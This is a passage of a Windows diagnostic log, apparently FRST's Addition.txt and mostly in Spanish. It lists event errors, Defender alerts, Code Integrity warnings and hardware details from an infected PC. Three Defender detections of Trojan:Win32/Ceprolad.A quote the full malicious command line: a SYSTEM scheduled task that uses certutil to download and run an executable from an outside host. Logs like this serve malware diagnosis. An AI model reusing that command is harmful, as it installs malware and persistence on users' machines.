C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log. Error: (11/17/2019 10:06:59 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Error del Servicio de instantáneas de volumen: error inesperado al llamar a la rutina CoCreateInstance. HR = 0x8007045b, Se está cerrando el sistema. . Error: (11/17/2019 10:06:59 PM) (Source: VSS) (EventID: 13) (User: ) Description: Información del Servicio de instantáneas de volumen: el servidor COM con CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} y el nombre CEventSystem no puede iniciarse. [0x8007045b, Se está cerrando el sistema. ] Error: (11/17/2019 10:03:47 PM) (Source: System Restore) (EventID: 8210) (User: ) Description: Error no especificado durante Restaurar sistema: (Punto de control programado). Información adicional: 0x800701b1. Error: (11/17/2019 09:41:34 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nombre de la aplicación con errores: AsusFanControlService.exe, versión: 1.0.0.1, marca de tiempo: 0x4e60a4b3 Nombre del módulo con errores: AsusFanControlService.exe, versión: 1.0.0.1, marca de tiempo: 0x4e60a4b3 Código de excepción: 0xc000041d Desplazamiento de errores: 0x001251a0 Identificador del proceso con errores: 0xdfc Hora de inicio de la aplicación con errores: 0x01d59d7953e9cb98 Ruta de acceso de la aplicación con errores: C:\Program Files (x86)\ASUS\AsusFanControlService\1.00.06\AsusFanControlService.exe Ruta de acceso del módulo con errores: C:\Program Files (x86)\ASUS\AsusFanControlService\1.00.06\AsusFanControlService.exe Identificador del informe: 32361605-03fd-4228-b729-9495492555c2 Nombre completo del paquete con errores: Identificador de aplicación relativa del paquete con errores: System errors: ============= Error: (11/18/2019 07:39:24 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: El servicio wuauserv se cerró con el siguiente error: El sistema no puede encontrar el archivo especificado. Error: (11/18/2019 07:39:24 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY) Description: El servidor {E60687F7-01A1-40AA-86AC-DB1CBF673334} no se registró con DCOM dentro del tiempo de espera requerido. Error: (11/18/2019 07:37:24 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: El servicio wuauserv se cerró con el siguiente error: El sistema no puede encontrar el archivo especificado. Error: (11/18/2019 07:37:24 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY) Description: El servidor {E60687F7-01A1-40AA-86AC-DB1CBF673334} no se registró con DCOM dentro del tiempo de espera requerido. Error: (11/18/2019 07:35:24 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: El servicio wuauserv se cerró con el siguiente error: El sistema no puede encontrar el archivo especificado. Error: (11/18/2019 07:35:24 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY) Description: El servidor {E60687F7-01A1-40AA-86AC-DB1CBF673334} no se registró con DCOM dentro del tiempo de espera requerido. Error: (11/18/2019 07:33:24 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: El servicio wuauserv se cerró con el siguiente error: El sistema no puede encontrar el archivo especificado. Error: (11/18/2019 07:33:24 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY) Description: El servidor {E60687F7-01A1-40AA-86AC-DB1CBF673334} no se registró con DCOM dentro del tiempo de espera requerido. Windows Defender: =================================== Date: 2019-11-16 22:06:00.102 Description: El examen de Antivirus de Windows Defender se detuvo antes de completarse. Id. de examen: {4815F22B-B303-4C72-A685-E380C3D738F9} Tipo de examen: Antimalware Parámetros de examen: Examen rápido Usuario: NT AUTHORITY\SYSTEM Date: 2019-11-16 19:55:47.343 Description: El examen de Antivirus de Windows Defender se detuvo antes de completarse. Id. de examen: {F39243C1-9D3A-4E39-BC8F-00C6C2351311} Tipo de examen: Antimalware Parámetros de examen: Examen rápido Usuario: NT AUTHORITY\SYSTEM Date: 2019-11-15 22:17:23.359 Description: Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado. Para más información, consulta lo siguiente: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0 Nombre: Trojan:Win32/Ceprolad.A Id.: 2147726914 Gravedad: Grave Categoría: Caballo de Troya Ruta de acceso: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exe C:\Users\Luis M\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Luis M\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F Origen de detección: Desconocido Tipo de detección: Concreto Origen de detección: Sistema Usuario: NT AUTHORITY\SYSTEM Nombre de proceso: Unknown Versión de inteligencia de seguridad: AV: 1.305.2170.0, AS: 1.305.2170.0, NIS: 1.305.2170.0 Versión de motor: AM: 1.1.16500.1, NIS: 1.1.16500.1 Date: 2019-11-15 21:52:58.268 Description: Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado. Para más información, consulta lo siguiente: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0 Nombre: Trojan:Win32/Ceprolad.A Id.: 2147726914 Gravedad: Grave Categoría: Caballo de Troya Ruta de acceso: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exe C:\Users\Luis M\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Luis M\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F Origen de detección: Desconocido Tipo de detección: Concreto Origen de detección: Sistema Usuario: NT AUTHORITY\SYSTEM Nombre de proceso: Unknown Versión de inteligencia de seguridad: AV: 1.305.2170.0, AS: 1.305.2170.0, NIS: 1.305.2170.0 Versión de motor: AM: 1.1.16500.1, NIS: 1.1.16500.1 Date: 2019-11-15 21:49:26.706 Description: Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado. Para más información, consulta lo siguiente: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0 Nombre: Trojan:Win32/Ceprolad.A Id.: 2147726914 Gravedad: Grave Categoría: Caballo de Troya Ruta de acceso: CmdLine:_C:\Windows\System32\cmd.exe /C certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exe C:\Users\Luis M\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Luis M\AppData\Local\Temp\csrss\scheduled.exe /31340 Origen de detección: Desconocido Tipo de detección: Concreto Origen de detección: Sistema Usuario: NT AUTHORITY\SYSTEM Nombre de proceso: Unknown Versión de inteligencia de seguridad: AV: 1.305.2170.0, AS: 1.305.2170.0, NIS: 1.305.2170.0 Versión de motor: AM: 1.1.16500.1, NIS: 1.1.16500.1 Date: 2019-11-17 22:36:50.870 Description: Antivirus de Windows Defender detectó un error al intentar actualizar la inteligencia de seguridad. Nueva versión de inteligencia de seguridad: Versión anterior de inteligencia de seguridad: 1.305.2289.0 Origen de actualización: Servidor de Microsoft Update Tipo de inteligencia de seguridad: AntiVirus Tipo de actualización: Completa Usuario: NT AUTHORITY\SYSTEM Versión actual del motor: Versión anterior del motor: 1.1.16500.1 Código de error: 0x80080005 Descripción del error: Error en la ejecución de servidor Date: 2019-11-17 22:03:51.325 Description: Antivirus de Windows Defender encontró un error al intentar descargar y configurar Windows Defender Offline. Código de error: 0x8000000a Descripción del error: El dato necesario para completar esta operación no está disponible todavía. Date: 2019-11-17 21:49:22.954 Description: La característica Protección en tiempo real de Antivirus de Windows Defender encontró un error: Característica: Durante el acceso Código de error: 0x8007043c Descripción del error: El servicio no puede iniciarse en modo a prueba de errores Motivo: La inteligencia de seguridad antimalware dejó de funcionar por motivos desconocidos. En algunos casos, reiniciar el servicio puede que resuelva el problema. Date: 2019-11-17 21:20:45.902 Description: Antivirus de Windows Defender detectó un error al intentar actualizar la inteligencia de seguridad. Nueva versión de inteligencia de seguridad: Versión anterior de inteligencia de seguridad: 1.305.2289.0 Origen de actualización: Servidor de Microsoft Update Tipo de inteligencia de seguridad: AntiVirus Tipo de actualización: Completa Usuario: NT AUTHORITY\SYSTEM Versión actual del motor: Versión anterior del motor: 1.1.16500.1 Código de error: 0x80080005 Descripción del error: Error en la ejecución de servidor Date: 2019-11-17 20:29:27.153 Description: Antivirus de Windows Defender detectó un error al intentar actualizar la inteligencia de seguridad. Nueva versión de inteligencia de seguridad: Versión anterior de inteligencia de seguridad: 1.305.2289.0 Origen de actualización: Servidor de Microsoft Update Tipo de inteligencia de seguridad: AntiVirus Tipo de actualización: Completa Usuario: NT AUTHORITY\SYSTEM Versión actual del motor: Versión anterior del motor: 1.1.16500.1 Código de error: 0x80080005 Descripción del error: Error en la ejecución de servidor CodeIntegrity: =================================== Date: 2019-11-18 19:15:58.670 Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\System32\spoolsv.exe) attempted to load \Device\HarddiskVolume1\Windows\System32\AdobePDF.dll that did not meet the Unchecked signing level requirements. Date: 2019-11-17 22:09:14.340 Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\System32\spoolsv.exe) attempted to load \Device\HarddiskVolume1\Windows\System32\AdobePDF.dll that did not meet the Unchecked signing level requirements. Date: 2019-11-17 21:58:58.399 Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\System32\spoolsv.exe) attempted to load \Device\HarddiskVolume1\Windows\System32\AdobePDF.dll that did not meet the Unchecked signing level requirements. Date: 2019-11-17 20:25:07.795 Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume1\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll that did not meet the Microsoft signing level requirements. Date: 2019-11-17 20:00:54.026 Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\System32\spoolsv.exe) attempted to load \Device\HarddiskVolume1\Windows\System32\AdobePDF.dll that did not meet the Unchecked signing level requirements. Date: 2019-11-16 20:24:59.845 Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume1\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll that did not meet the Microsoft signing level requirements. Date: 2019-11-16 20:12:04.968 Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\System32\spoolsv.exe) attempted to load \Device\HarddiskVolume1\Windows\System32\AdobePDF.dll that did not meet the Unchecked signing level requirements. Date: 2019-11-16 19:38:56.567 Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\System32\spoolsv.exe) attempted to load \Device\HarddiskVolume1\Windows\System32\AdobePDF.dll that did not meet the Unchecked signing level requirements. ==================== Memory info =========================== BIOS: American Megatrends Inc. 3603 02/16/2012 Motherboard: ASUSTeK COMPUTER INC. V-P8H67E Processor: Intel(R) Core(TM) i5-2400 CPU @ 3.10GHz Percentage of memory in use: 57% Total physical RAM: 8025.14 MB Available physical RAM: 3383.52 MB Total Virtual: 9924.14 MB Available Virtual: 5144.24 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:1396.77 GB) (Free:319.26 GB) NTFS ==>[drive with boot components (obtained from BCD)] Drive d: (ESD-USB) (Removable) (Total:7.4 GB) (Free:3.41 GB) FAT32 \\?\Volume{1600a1cc-0000-0000-0000-20315d010000}\ () (Fixed) (Total:0.49 GB) (Free:0.08 GB) NTFS ==================== MBR & Partition Table ==================== ========================================================== Disk: 0 (MBR Code: Windows 7/8/10) (Size: 1397.3 GB) (Disk ID: 1600A1CC) Partition 1: (Active) - (Size=1396.8 GB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=506 MB) - (Type=27) ========================================================== Disk: 1 (MBR Code: Windows 7/8/10) (Size: 7.4 GB) (Disk ID: 65F2B86C) Partition 1: (Active) - (Size=7.4 GB) - (Type=0C) ==================== End of Addition.txt =======================